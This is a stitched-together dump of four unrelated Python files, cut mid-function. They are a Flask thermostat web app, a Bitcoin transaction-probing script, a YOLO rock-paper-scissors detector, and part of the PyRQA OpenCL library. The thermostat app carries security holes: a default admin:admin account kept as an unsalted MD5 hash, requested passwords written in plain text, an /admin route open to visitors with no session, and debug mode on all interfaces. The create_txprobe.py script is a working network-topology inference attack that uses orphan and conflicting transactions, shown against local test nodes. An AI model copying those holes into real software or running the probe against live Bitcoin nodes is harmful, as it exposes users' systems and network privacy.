'thursday': 'Th', 'friday': 'F', 'saturday': 'Sa'}
storeobject('days_short', days_short)
try:
props = loadobject('props')
except FileNotFoundError:
props['status_fan'] = 'auto'
props['status_ac'] = 'off'
props['status_heat'] = 'off'
props['events'] = []
props['trigger_temp'] = 75
if not os.path.exists('settings.conf'):
shutil.copy2('sample_settings.conf', 'settings.conf')
with open('settings.conf', 'r') as settings_file:
config = json.load(settings_file)
IO.init(config)
props['units'] = config['units']
storeobject('weather_api_key', config['weather_api_key'])
storeobject('location', config['location'])
storeobject('props', props)
props['temp_inside'] = '%.1f' % IO.gettemp()
props['temp_outside'] = getoutsidetemp()
if not os.path.exists('passwords.txt'):
with open('passwords.txt', 'w') as f:
f.write('admin:%s\n' % md5(b'admin').hexdigest())
storeobject('api_user_salts', {})
storeobject('props', props)
t = threading.Thread(target=periodicrun, daemon=True)
t.start()
@app.route('/setstate', methods=['GET'])
def setstate():
api_user_salts = loadobject('api_user_salts')
if 'user' in flask.request.args:
user = flask.request.args['user']
password_md5 = flask.request.args['password_hash']
if (not user in api_user_salts or
not checkpassword(user, password_md5, api_user_salts[user])):
return '403'
# API will never see this new salt
# This is just done to get rid of the old one
api_user_salts[user] = gensecret()
else:
user = flask.session['current_user']
storeobject('api_user_salts', api_user_salts)
props = loadobject('props')
if ('status_ac' in flask.request.args and
('status_heat' not in flask.request.args or flask.request.args['status_heat'] == 'off')):
props['status_ac'] = flask.request.args['status_ac']
if ('status_heat' in flask.request.args and
('status_ac' not in flask.request.args or flask.request.args['status_ac'] == 'off')):
props['status_heat'] = flask.request.args['status_heat']
if 'status_fan' in flask.request.args:
props['status_fan'] = flask.request.args['status_fan']
if 'trigger_temp' in flask.request.args:
props['trigger_temp'] = int(flask.request.args['trigger_temp'])
logging.warning('%s set fan:%s ac:%s heat:%s temp:%s' % (user, props['status_fan'], props['status_ac'],
props['status_heat'], props['trigger_temp']))
storeobject('props', props)
return flask.redirect('/')
@app.route('/newevent', methods=['GET'])
def newevent():
validation = validateuser()
if not validation:
return flask.redirect('/')
#with open('pickledb/days_short.pickle', 'rb') as days_short_file:
# days_short = pickle.load(days_short_file)
days_short = loadobject('days_short')
f = flask.request.args.copy()
days = ''
for day in f.getlist('days_select'):
days += days_short[day]
if f['mode_select'] == 'auto':
temp = f['temp']
else:
temp = ''
if f['device_select'] == 'fan' and f['mode_select'] == 'off':
# This configuration is not possible without
# manually crafting the GET request...
return flask.redirect('/')
t = f['time']
while len(t) < 4:
t = '0' + t
props = loadobject('props')
props['events'].append([days, t, f['device_select'], f['mode_select'], temp])
# Sort by execution time
props['events'].sort(key=lambda x: x[1])
logging.warning('%s created event %s' % (flask.session['current_user'], str(props['events'][-1])))
storeobject('props', props)
return flask.redirect('/')
@app.route('/deleteevent', methods=['GET'])
def deleteevent():
validation = validateuser()
if not validation:
return flask.redirect('/')
eventIndex = int(flask.request.args['index'])
props = loadobject('props')
logging.warning('%s deleted event %s' % (flask.session['current_user'], str(props['events'][eventIndex])))
props['events'].pop(eventIndex)
storeobject('props', props)
return flask.redirect('/')
@app.route('/login', methods=['GET', 'POST'])
def login():
"""How authentification works:
Account setup: password is transferred as a plain text md5 hash
and is vulnerable to interception over http at this time
Normal login: GET request generates new 64-byte random secret which is embedded in the page js.
When a password is entered, we get the md5 hash then append the secret to this hash
and then hash it again.
Result: an attackter cannot use intercepted data to log in.
If the ip address of a user's request changes. Validation will return false
to prevent copying cookies from a local maching and moving them elsewhere"""
if 'session_salt' not in flask.session or flask.request.method == 'GET':
flask.session['session_salt'] = gensecret()
return flask.render_template('login.html', secret=flask.session['session_salt'])
user = flask.request.form['username']
password = flask.request.form['password']
with open('passwords.txt', 'r') as f:
passwords = dict(line.split(':') for line in f.read().split())
if not checkpassword(user, password, flask.session['session_salt']):
return flask.render_template('login.html', error='Invalid username or password',
secret=flask.session['session_salt'])
    flask.session['session_salt'] = gensecret()  # Create a new secret after successful login
flask.session['current_user'] = user
# Record ip of login. If this changes, preexisting login sessions will be invalidated.
#flask.session['last_seen_ip'] = flask.request.remote_addr
flask.session['last_seen_ip'] = flask.request.environ['REMOTE_ADDR']
# logging.warning('%s logged in' % user)
return flask.redirect('/')
@app.route('/logout', methods=['GET'])
def logout():
# logging.warning('%s logged out' % flask.session['current_user'])
flask.session['current_user'] = ''
return flask.redirect('/login')
@app.route('/requestuser', methods=['GET', 'POST'])
def requestuser():
if flask.request.method == 'GET':
return flask.redirect('/login')
username = flask.request.form['req_username']
password = flask.request.form['req_password_1']
with open('passwords.txt', 'r') as f:
current_users = [line.split(':')[0] for line in f.read().split()]
if username in current_users:
message = 'That user already exists!'
elif any(ord(c) > 255 for c in username):
message = 'Usernames may not contain unicode characters!'
else:
with open('user_requests.txt', 'a') as f_req:
f_req.write('%s:%s\n' % (username, password))
message = 'Request sent!'
return flask.render_template('login.html', error=message, secret=flask.session['session_salt'])
@app.route('/admin', methods=['GET'])
def adminpanel():
if 'current_user' in flask.session and flask.session['current_user'] != 'admin':
return flask.redirect('/')
with open('user_requests.txt', 'r') as f_req:
request_users = dict(line.split(':') for line in f_req.read().split())
with open('passwords.txt', 'r') as f_users:
all_users = dict(line.split(':') for line in f_users.read().split())
if flask.request.args:
if flask.request.args['action'] == 'confirm':
new_user = flask.request.args['user']
all_users[new_user] = request_users[new_user]
request_users.pop(new_user)
elif flask.request.args['action'] == 'deny':
request_users.pop(flask.request.args['user'])
elif flask.request.args['action'] == 'delete':
if flask.request.args['user'] != 'admin':
all_users.pop(flask.request.args['user'])
with open('user_requests.txt', 'w') as f_req:
for user, passwd in request_users.items():
f_req.write('%s:%s\n' % (user, passwd))
with open('passwords.txt', 'w') as f_users:
for user, passwd in all_users.items():
f_users.write('%s:%s\n' % (user, passwd))
return flask.render_template('admin.html', requests=request_users.keys(), all_users=all_users)
@app.route('/', methods=['GET'])
def rootdir():
# This is a good place to start
validation = validateuser()
if not validation:
return flask.redirect('/login')
props = loadobject('props')
page = flask.render_template('root.html', **dict(props, **flask.session))
return page
@app.route('/api', methods=['GET'])
def api():
"""Get information only. json formatted"""
return flask.render_template('api.html', **loadobject('props'))
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8056, debug=True, use_reloader=False)
|
create_txprobe.py
|
from binascii import hexlify, unhexlify
from bitcoin.core import *
from bitcoin.core.key import *
from bitcoin.core.script import *
from bitcoin.core.scripteval import *
from bitcoin import base58
from bitcoin.messages import *
import time
from cStringIO import StringIO
from test_createtx import Transaction, void_coinbase, k, txpair_from_p2sh, get_txin_second
import logger
from txtools import *
from connector import *
def do_send(sock, msg):
written = 0
while (written < len(msg)):
rv = sock.send(msg[written:], 0)
if rv > 0:
written = written + rv
if rv < 0:
raise Exception("Error on write (this happens automatically in python?)");
def get_cxns():
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)
#socket.create_connection
sock.connect("/tmp/bitcoin_control")
cmsg = command_msg(commands.COMMAND_GET_CXN, 0)
ser = cmsg.serialize()
do_send(sock, ser)
length = sock.recv(4, socket.MSG_WAITALL)
length, = unpack('>I', length)
infos = sock.recv(length, socket.MSG_WAITALL)
# Each info chunk should be 36 bytes
cur = 0
while(len(infos[cur:cur+36]) > 0):
cinfo = connection_info.deserialize(infos[cur:cur+36])
print "{0} {1}:{2} - {3}:{4}".format(cinfo.handle_id, cinfo.remote_addr, cinfo.remote_port, cinfo.local_addr, cinfo.local_port)
yield cinfo.handle_id[0]
cur = cur + 36
def create_txprobe(input1, input2, n):
"""Creates several kinds of transactions:
PARENT[i]:
spends input1
creates output p[i]
ORPHAN[i]:
spends input2, and p[i]
creates output o[i] for recovery.
FLOOD:
spends input1, blocks parent[i]
"""
PARENTS = []
ORPHANS = []
for i in range(n):
tx_parent = Transaction()
tx_parent.vin = [input1]
_tx_parent_out,tx_parent_in = txpair_from_p2sh(nValue=0.008*COIN)
tx_parent.append_txout(_tx_parent_out)
tx_parent.finalize()
PARENTS.append(tx_parent)
tx_orphan = Transaction()
tx_orphan.vin = [input2, tx_parent_in]
_tx_orphan_out,tx_orphan_in = txpair_from_p2sh(nValue=0.005*COIN)
tx_orphan.append_txout(_tx_orphan_out)
tx_orphan.finalize()
ORPHANS.append(tx_orphan)
FLOOD = Transaction()
FLOOD.vin = [input1]
_flood_out,tx_flood_in = txpair_from_p2sh(nValue=0.008*COIN)
FLOOD.append_txout(_flood_out)
FLOOD.finalize()
return PARENTS, ORPHANS, FLOOD
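# Illustrative note: for one trial, create_txprobe(in1, in2, len(target_set))
# yields len(target_set) parent/orphan pairs plus one FLOOD transaction.
# FLOOD and every PARENT[i] spend the same input1, so they conflict, while
# ORPHAN[i] spends PARENT[i]'s output and is only valid once PARENT[i] is
# known. run_experiment2() and check_logs() below use this to infer which
# test nodes are peered with which target nodes.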
def make_block():
block = CBlock()
if 1:
prevhash = "00000000000000005bac7c3c745d926451483e7a15ce7a76627861f19f756d22" # Block 302980 on main chain
nBits = 409544770
height = 302981
nTime = 1401257762
ver = 2
block.hashPrevBlock = unhexlify(prevhash)[::-1]
block.vtx.append(void_coinbase(height=height))
block.nBits = nBits
block.nNonce = 9999999 # Not a valid proof of work, but this is ok
block.nTime = nTime
block.nVersion = ver;
return block
def schedule(elems):
# Rows and columns
import math
n = len(elems)
sn = int(math.ceil(math.sqrt(n)))
s = range(n)
sets = []
# Rows
for i in range(sn):
tgt = elems[i*sn:(i+1)*sn]
tst = set(elems).difference(set(tgt))
if not tgt: continue
sets.append((tgt,tst))
# Columns
for i in range(sn):
tgt = elems[i::sn]
tst = set(elems).difference(set(tgt))
sets.append((tgt,tst))
return sets
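# Example (illustrative): schedule(range(9)) gives sn = 3, so the target sets
# are the rows [0,1,2], [3,4,5], [6,7,8] followed by the columns [0,3,6],
# [1,4,7], [2,5,8]; each target set is paired with the set of all remaining
# elements, which serves as the test set.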
def make_experiment2(path='./experiment2_payload.dat'):
import time
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)
#socket.create_connection
sock.connect("/tmp/bitcoin_control")
# Reset all the connections
print 'Resetting connections'
n = 79
cmsg = command_msg(commands.COMMAND_DISCONNECT, 0, [targets.BROADCAST])
ser = cmsg.serialize()
do_send(sock, ser)
for i in range(1,n+1):
msg = connect_msg('127.0.0.1', 8332+i, '0.0.0.0', 0)
ser = msg.serialize()
do_send(sock, ser)
print 'Connecting'
time.sleep(2)
nodes = list(get_cxns())
print 'Nodes:', nodes
import math
sn = int(math.ceil(math.sqrt(n)))
sched = schedule(range(n))
print 'sqrt(n):', sn
print 'schedule:', len(sched)
# 1. Create a setup transaction with enough inputs for 2 boosters per trial
tx_setup = Transaction()
tx_setup.vin = [get_txin_second()]
tx_setup_ins = []
for _ in sched:
for _ in range(2):
_out,_in = txpair_from_p2sh(nValue=0.01*COIN)
tx_setup.append_txout(_out)
tx_setup_ins.append(_in)
tx_setup.finalize()
# 1a. Add tx_setup to a block
block = make_block()
block.vtx.append(tx_setup._ctx)
block.hashMerkleRoot = block.calc_merkle_root()
PAYLOADS = []
for i,(tgt,tst) in enumerate(sched):
PARENTS, ORPHANS, FLOOD = create_txprobe(tx_setup_ins[2*i+0], tx_setup_ins[2*i+1], len(tgt))
PAYLOADS.append((PARENTS, ORPHANS, FLOOD))
return nodes, block, PAYLOADS
def check_logs(nodes, PARENTS, ORPHANS, FLOOD, logs):
orphan_hashes = [Hash(o._ctx.serialize()) for o in ORPHANS]
d = dict(zip(orphan_hashes, nodes))
edges = set()
for log in logs:
if log.is_sender: continue
msg = MsgSerializable.stream_deserialize(StringIO('\xf9'+log.bitcoin_msg))
if msg.command != 'getdata': continue
print log.handle_id
connected = set(nodes)
connected.remove(log.handle_id) # Remove self
for i in msg.inv:
connected.remove(d[i.hash])
for i in connected:
edges.add(tuple(sorted((log.handle_id-min(nodes)+1,i-min(nodes)+1))))
for i,j in sorted(edges):
print i, '<->', j
yield i,j
def check_all_logs(nodes, PAYLOADS, logs):
sched = schedule(nodes)
edges = set()
# First determine the edges to pay attention to
d = {}
expected = dict((n,[]) for n in nodes)
assert(len(PAYLOADS) == len(sched))
for (tgt,tst),(PARENTS,ORPHANS,_) in zip(sched,PAYLOADS):
orphan_hashes = [Hash(o._ctx.serialize()) for o in ORPHANS]
assert(len(orphan_hashes) == len(tgt))
d.update(dict(zip(orphan_hashes, tgt)))
for n in tst: expected[n] += orphan_hashes
for n in nodes: expected[n] = set(expected[n])
actual = dict((n,[]) for n in nodes)
for log in logs:
if log.is_sender: continue
msg = MsgSerializable.stream_deserialize(StringIO('\xf9'+log.bitcoin_msg))
if msg.command != 'getdata': continue
for i in msg.inv:
if i.hash in expected[log.handle_id]:
actual[log.handle_id].append(i.hash)
for n in nodes: actual[n] = set(actual[n])
for i in nodes:
for h in expected[i]:
j = d[h]
if h not in actual[i]:
edges.add(tuple(sorted((j-min(nodes)+1,i-min(nodes)+1))))
for i,j in sorted(edges):
print i, '<->', j
yield i,j
def run_experiment2(nodes, block, PAYLOADS):
import time
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)
#socket.create_connection
sock.connect("/tmp/bitcoin_control")
# Set up a sending thread and queue
from threading import Lock, Thread
lock = Lock()
# Helper functions
def register_block(blk):
m = msg_block()
m.block = blk
cmsg = bitcoin_msg(m.serialize())
ser = cmsg.serialize()
lock.acquire()
do_send(sock, ser)
rid = sock.recv(4)
lock.release()
rid, = unpack('>I', rid) # message is now saved and can be sent to users with this id
return rid
def register_tx(tx):
m = msg_tx()
m.tx = tx._ctx
cmsg = bitcoin_msg(m.serialize())
ser = cmsg.serialize()
lock.acquire()
do_send(sock, ser)
rid = sock.recv(4)
lock.release()
rid, = unpack('>I', rid) # message is now saved and can be sent to users with this id
return rid
def register_inv(txs):
m = msg_inv()
for tx in txs:
inv = CInv()
inv.type = 1 # TX
inv.hash = Hash(tx._ctx.serialize())
m.inv.append(inv)
cmsg = bitcoin_msg(m.serialize())
ser = cmsg.serialize()
lock.acquire()
do_send(sock, ser)
rid = sock.recv(4)
lock.release()
rid, = unpack('>I', rid) # message is now saved and can be sent to users with this id
return rid
def broadcast(rid):
cmsg = command_msg(commands.COMMAND_SEND_MSG, rid, (targets.BROADCAST,))
ser = cmsg.serialize()
lock.acquire()
do_send(sock, ser)
lock.release()
def send_to_nodes(rid, nodes):
cmsg = command_msg(commands.COMMAND_SEND_MSG, rid, nodes)
ser = cmsg.serialize()
lock.acquire()
do_send(sock, ser)
lock.release()
# Run the experiment!
print 'Setup'
broadcast(register_block(block))
sched = schedule(nodes)
global logs, all_logs
all_logs = []
print 'Reading'
logsock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)
logsock.connect("/tmp/logger/clients/bitcoin_msg")
for (target_set, test_set), (PARENTS, ORPHANS, FLOOD) in zip(sched, PAYLOADS):
def g((target_set, test_set), (PARENTS, ORPHANS, FLOOD)):
print "Targets:", target_set
print 'Step 1: inv locking'
broadcast(register_inv(PARENTS + [FLOOD]))
time.sleep(1)
print 'Step 2: send the flood'
send_to_nodes(register_tx(FLOOD), test_set)
print 'Step 3: prime the orphans'
for n,orphan in zip(target_set,ORPHANS):
send_to_nodes(register_tx(orphan), (n,))
time.sleep(3) # Make sure the flood propagates
print 'Step 4: send parents'
for n,parent in zip(target_set,PARENTS):
send_to_nodes(register_tx(parent), (n,))
time.sleep(10)
print 'Step 5: read back'
send_to_nodes(register_inv(ORPHANS), test_set)
Thread(target=g,args=((target_set, test_set), (PARENTS, ORPHANS, FLOOD))).start()
#g()
logs = []
deadline = time.time() + 20
def _read_logs():
while(True):
logsock.settimeout(deadline - time.time())
try:
length = logsock.recv(4, socket.MSG_WAITALL);
length, = unpack('>I', length)
logsock.settimeout(deadline - time.time())
record = logsock.recv(length, socket.MSG_WAITALL)
except socket.timeout: break
log_type, timestamp, rest = logger.log.deserialize_parts(record)
log = logger.type_to_obj[log_type].deserialize(timestamp, rest)
logs.append(log)
logsock.settimeout(None)
print 'Done'
t = Thread(target=_read_logs)
t.start()
t.join()
|
process.py
|
import cv2 as cv
import numpy as np
from threading import Thread
from frame_queue import FrameQueue
import queue
import time
import os
import sys
from utils import file_path
class ImageProcessor:
'''Process images with the OpenCV DNN YOLO implementation.
Images and predictions are stored in parallel queues.'''
def __init__(self, ImageProvider, Config):
self.ImageProvider = ImageProvider
self.processedQueue = FrameQueue()
self.predictionQueue = queue.Queue()
self.processing = False
self.config = Config
self.classes = self.load_classes()
self.processThread = Thread(target=self.processThreadBody, daemon=True)
self.processThread.start()
self.draw = False
def load_classes(self):
'''Load YOLO model class file'''
classes_path = self.config.get_property('classes_path')
if classes_path is None:
            raise KeyError('Configuration property "classes_path" '
                           'not configured')
try:
f = open(file_path(classes_path), "rt")
classes = f.read().rstrip('\n').split('\n')
f.close()
return classes
except FileNotFoundError as e:
print('Class file not found')
exit(1)
def get_classes(self):
'''Returns the ordered list of classes'''
return self.classes
def start_processing(self, dt=0):
'''Start processing images through the neural network'''
self.processedQueue.queue.clear()
self.predictionQueue.queue.clear()
self.processing = True
def stop_processing(self):
'''Stop processing images through the neural network'''
self.processing = False
def start_drawing(self):
'''Start drawing circles on processed frames around detected objects'''
self.draw = True
def stop_drawing(self):
'''Stop drawing circles'''
self.draw = False
def is_processing(self):
'''Returns True if images are currently being passed through the network'''
return self.processing
def get_frame(self):
        '''Get the next processed frame from the queue.

        Returns:
            A tuple where the first item is True if a frame exists in the
            queue and False if the frame queue is empty. The second item is
            either image data or None, depending on whether an image was
            available.
        '''
try:
return (True, self.processedQueue.get_nowait())
except queue.Empty:
return (False, None)
def get_frame_predictions(self):
        '''Get YOLO object detections from the prediction queue.

        Returns:
            A tuple where the first item is True if a frame prediction exists
            in the queue. The second item is either None (if no predictions
            are available) or a list of dictionaries. Each dictionary is one
            object detection and contains the following data:
                x: box center pixel along image x-axis,
                y: box center pixel along image y-axis,
                width: box width in pixels,
                height: box height in pixels,
                class: 'Rock', 'Paper', or 'Scissors',
                confidence: percentage confidence value
        '''
try:
return (True, self.predictionQueue.get_nowait())
except queue.Empty:
return (False, None)
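    # Illustrative usage sketch (assumes an ImageProvider and Config object
    # exposing the methods used by this class; names are hypothetical):
    #   processor = ImageProcessor(provider, config)
    #   processor.start_processing()
    #   ok, predictions = processor.get_frame_predictions()
    #   if ok:
    #       for p in predictions:
    #           print(p['class'], p['confidence'])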
def processThreadBody(self):
'''Thread body which handles YOLO processing'''
# These values could be updated after the thread starts
# Get configuration values
weights_path = file_path(self.config.get_property('weights_path'))
cfg_path = file_path(self.config.get_property('cfg_path'))
inpWidth = self.config.get_property('inpWidth')
inpHeight = self.config.get_property('inpHeight')
scale = self.config.get_property('scale')
mean = self.config.get_property('mean')
confThreshold = self.config.get_property('confThreshold')
nmsThreshold = self.config.get_property('nmsThreshold')
circle_scale = self.config.get_property('circle_scale')
        # Initialize the OpenCV darknet DNN module
net = cv.dnn.readNet(weights_path, cfg_path, 'darknet')
outNames = net.getUnconnectedOutLayersNames()
frameWidth, frameHeight = self.ImageProvider.get_dimensions()
while True:
if not self.processing:
time.sleep(0.1)
else:
ret, frame = self.ImageProvider.get_frame()
if ret:
self.ImageProvider.clear_frames()
framePredictions = list()
blob = cv.dnn.blobFromImage(frame,
size=(inpWidth, inpHeight),
swapRB=False, ddepth=cv.CV_8U)
net.setInput(blob, scalefactor=scale, mean=mean)
outs = net.forward(outNames)
boxes = []
confidences = []
classIDs = []
for out in outs:
for detection in out:
scores = detection[5:8]
classId = np.argmax(scores)
confidence = scores[classId]
if confidence > confThreshold:
center_x = int(detection[0] * frameWidth)
center_y = int(detection[1] * frameHeight)
width = int(detection[2] * frameWidth)
height = int(detection[3] * frameHeight)
left = int(center_x - width / 2)
top = int(center_y - height / 2)
classIDs.append(classId)
confidences.append(float(confidence))
boxes.append([left, top, width, height])
indices = cv.dnn.NMSBoxes(boxes, confidences,
confThreshold, nmsThreshold)
for i in indices:
i = i[0]
box = boxes[i]
left = box[0]
top = box[1]
width = box[2]
height = box[3]
center_x = int(left+(width/2))
center_y = int(top+(height/2))
object = self.classes[classIDs[i]]
if self.draw:
if object == "Rock":
color = (255, 0, 0)
elif object == "Paper":
color = (0, 255, 0)
elif object == "Scissors":
color = (0, 0, 255)
cv.rectangle(frame, (center_x-int(width/2), center_y+int(height/2)), (center_x+int(width/2), center_y-int(height/2)), color)
prediction = {
'x': center_x,
'y': center_y,
'width': width,
'height': height,
'class': object,
'confidence': confidences[i]
}
framePredictions.append(prediction)
self.processedQueue.put(frame)
self.predictionQueue.put(framePredictions)
|
row_mat_byte_rec.py
|
#!/usr/bin/python
#
# This file is part of PyRQA.
# Copyright 2015 Tobias Rawald, Mike Sips.
"""
RQA, Fixed Radius, OpenCL, RowMatByteRec
"""
import numpy as np
import os
import pyopencl as cl
import threading
import Queue
from ....abstract_classes import AbstractRunnable
from ....opencl import OpenCL
from ....processing_order import Diagonal
from ....recurrence_analysis import RQASubMatricesCarryover
from ....result import RQAResult
from ....runtimes import Runtimes
class RowMatByteRec(RQASubMatricesCarryover, AbstractRunnable):
"""
Input Data Representation: Row-Store
Similarity Value Materialisation: Yes
Similarity Value Representation: Byte
Intermediate Results Recycling: Yes
"""
def __init__(self,
settings,
opencl=None,
verbose=False,
command_line=False,
edge_length=10240,
processing_order=Diagonal,
optimisations_enabled=False,
data_type=np.uint8):
RQASubMatricesCarryover.__init__(self, settings, verbose, edge_length, processing_order)
self.opencl = opencl
self.command_line = command_line
self.optimisations_enabled = optimisations_enabled
self.data_type = data_type
self.__initialise()
def __initialise(self):
self.validate_opencl()
self.threads_runtimes = {}
self.threads_diagonal_frequency_distribution = {}
self.threads_vertical_frequency_distribution = {}
self.threads_white_vertical_frequency_distribution = {}
for device in self.opencl.devices:
self.threads_runtimes[device] = Runtimes()
self.threads_diagonal_frequency_distribution[device] = self.get_emtpy_global_frequency_distribution()
self.threads_vertical_frequency_distribution[device] = self.get_emtpy_global_frequency_distribution()
self.threads_white_vertical_frequency_distribution[device] = self.get_emtpy_global_frequency_distribution()
def reset(self):
RQASubMatricesCarryover.reset(self)
self.__initialise()
def validate_opencl(self):
if not self.opencl:
self.opencl = OpenCL(verbose=self.verbose,
command_line=self.command_line,
optimisations_enabled=self.optimisations_enabled)
if not self.opencl.programs_created:
self.opencl.create_programs(kernel_file_names=self.settings.get_kernel_file_names(self),
similarity_measure_name=self.settings.similarity_measure.name,
leaf_path=os.path.dirname(os.path.abspath(__file__)),
root_path=self.settings.base_path)
def process_sub_matrix(self, *args, **kwargs):
device = kwargs['device']
sub_matrix_queue = kwargs['sub_matrix_queue']
context = self.opencl.contexts[device]
command_queue = self.opencl.command_queues[device]
program = self.opencl.programs[device]
vertical_kernel = cl.Kernel(program, 'vertical')
diagonal_kernel = cl.Kernel(program, self.settings.diagonal_kernel_name)
while True:
try:
sub_matrix = sub_matrix_queue.get(False)
transfer_from_device_events = []
transfer_to_device_events = []
create_matrix_events = []
vertical_events = []
diagonal_events = []
# Vectors X
vectors_x = self.get_vectors_x(sub_matrix)
vectors_x_buffer = cl.Buffer(context,
cl.mem_flags.READ_ONLY,
vectors_x.size * vectors_x.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
vectors_x_buffer,
vectors_x,
device_offset=0,
wait_for=None,
is_blocking=False))
# Vectors Y
vectors_y = self.get_vectors_y(sub_matrix)
vectors_y_buffer = cl.Buffer(context,
cl.mem_flags.READ_ONLY,
vectors_y.size * vectors_y.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
vectors_y_buffer,
vectors_y,
device_offset=0,
wait_for=None,
is_blocking=False))
# Recurrence matrix
# matrix = self.get_matrix(sub_matrix)
# matrix_buffer = cl.Buffer(context, cl.mem_flags.READ_WRITE, matrix.size * matrix.itemsize)
# transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue, matrix_buffer, matrix, device_offset=0, wait_for=None, is_blocking=False))
matrix = np.zeros(1,
dtype=self.data_type)
matrix_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
int(self.get_recurrence_matrix_size(sub_matrix, self.data_type)))
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
matrix_buffer,
matrix,
device_offset=0,
wait_for=None,
is_blocking=False))
# Recurrence points
recurrence_points, \
recurrence_points_start, \
recurrence_points_end = self.get_recurrence_points(sub_matrix)
recurrence_points_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
recurrence_points.size * recurrence_points.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
recurrence_points_buffer,
recurrence_points,
device_offset=0,
wait_for=None,
is_blocking=False))
# Vertical frequency distribution
vertical_frequency_distribution = self.get_empty_local_frequency_distribution()
vertical_frequency_distribution_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
vertical_frequency_distribution.size * vertical_frequency_distribution.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
vertical_frequency_distribution_buffer,
vertical_frequency_distribution,
device_offset=0,
wait_for=None,
is_blocking=False))
# White vertical frequency distribution
white_vertical_frequency_distribution = self.get_empty_local_frequency_distribution()
white_vertical_frequency_distribution_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
white_vertical_frequency_distribution.size * white_vertical_frequency_distribution.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
white_vertical_frequency_distribution_buffer,
white_vertical_frequency_distribution,
device_offset=0,
wait_for=None,
is_blocking=False))
# Diagonal frequency distribution
diagonal_frequency_distribution = self.get_empty_local_frequency_distribution()
diagonal_frequency_distribution_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
diagonal_frequency_distribution.size * diagonal_frequency_distribution.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
diagonal_frequency_distribution_buffer,
diagonal_frequency_distribution,
device_offset=0,
wait_for=None,
is_blocking=False))
# Vertical carryover
vertical_carryover, \
vertical_carryover_start,\
vertical_carryover_end = self.get_vertical_length_carryover(sub_matrix)
vertical_carryover_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
vertical_carryover.size * vertical_carryover.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
vertical_carryover_buffer,
vertical_carryover,
device_offset=0,
wait_for=None,
is_blocking=False))
# White vertical carryover
white_vertical_carryover, \
white_vertical_carryover_start,\
white_vertical_carryover_end = self.get_white_vertical_length_carryover(sub_matrix)
white_vertical_carryover_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
white_vertical_carryover.size * white_vertical_carryover.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
white_vertical_carryover_buffer,
white_vertical_carryover,
device_offset=0,
wait_for=None,
is_blocking=False))
# Diagonal carryover
diagonal_carryover, \
diagonal_carryover_start, \
diagonal_carryover_end = self.get_diagonal_length_carryover(sub_matrix)
diagonal_carryover_buffer = cl.Buffer(context,
cl.mem_flags.READ_WRITE,
diagonal_carryover.size * diagonal_carryover.itemsize)
transfer_to_device_events.append(cl.enqueue_write_buffer(command_queue,
diagonal_carryover_buffer,
diagonal_carryover,
device_offset=0,
wait_for=None,
is_blocking=False))
command_queue.finish()
# Vertical kernel
vertical_args = [vectors_x_buffer,
vectors_y_buffer,
np.uint32(sub_matrix.dim_x),
np.uint32(sub_matrix.dim_y),
np.uint32(self.settings.embedding_dimension),
np.uint32(self.settings.time_delay),
np.float32(self.settings.neighbourhood.radius),
recurrence_points_buffer,
vertical_frequency_distribution_buffer,
vertical_carryover_buffer,
white_vertical_frequency_distribution_buffer,
white_vertical_carryover_buffer,
matrix_buffer]
OpenCL.set_kernel_args(vertical_kernel,
vertical_args)
global_work_size = [int(sub_matrix.dim_x + (device.max_work_group_size - (sub_matrix.dim_x % device.max_work_group_size)))]
local_work_size = None
vertical_events.append(cl.enqueue_nd_range_kernel(command_queue,
vertical_kernel,
global_work_size,
local_work_size))
command_queue.finish()
# Diagonal kernel
if self.settings.is_matrix_symmetric:
diagonal_args = [matrix_buffer,
np.uint32(sub_matrix.dim_x),
np.uint32(sub_matrix.dim_y),
np.uint32(sub_matrix.start_x),
np.uint32(sub_matrix.start_y),
np.uint32(self.settings.theiler_corrector),
np.uint32(self.get_diagonal_offset(sub_matrix)),
diagonal_frequency_distribution_buffer,
diagonal_carryover_buffer]
global_work_size = [int(sub_matrix.dim_x + (device.max_work_group_size - (sub_matrix.dim_x % device.max_work_group_size)))]
else:
diagonal_args = [matrix_buffer,
np.uint32(sub_matrix.dim_x),
np.uint32(sub_matrix.dim_y),
np.uint32(sub_matrix.dim_x + sub_matrix.dim_y - 1),
np.uint32(sub_matrix.start_x),
np.uint32(sub_matrix.start_y),
np.uint32(self.settings.theiler_corrector),
diagonal_frequency_distribution_buffer,
diagonal_carryover_buffer]
global_work_size_x = sub_matrix.dim_x + sub_matrix.dim_y - 1
global_work_size = [int(global_work_size_x + (device.max_work_group_size - (global_work_size_x % device.max_work_group_size)))]
OpenCL.set_kernel_args(diagonal_kernel,
diagonal_args)
local_work_size = None
diagonal_events.append(cl.enqueue_nd_range_kernel(command_queue,
diagonal_kernel,
global_work_size,
local_work_size))
command_queue.finish()
# Read buffer
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
recurrence_points_buffer,
self.recurrence_points[recurrence_points_start:recurrence_points_end],
device_offset=0,
wait_for=None,
is_blocking=False))
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
vertical_frequency_distribution_buffer,
vertical_frequency_distribution,
device_offset=0,
wait_for=None,
is_blocking=False))
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
vertical_carryover_buffer,
self.vertical_length_carryover[vertical_carryover_start:vertical_carryover_end],
device_offset=0,
wait_for=None,
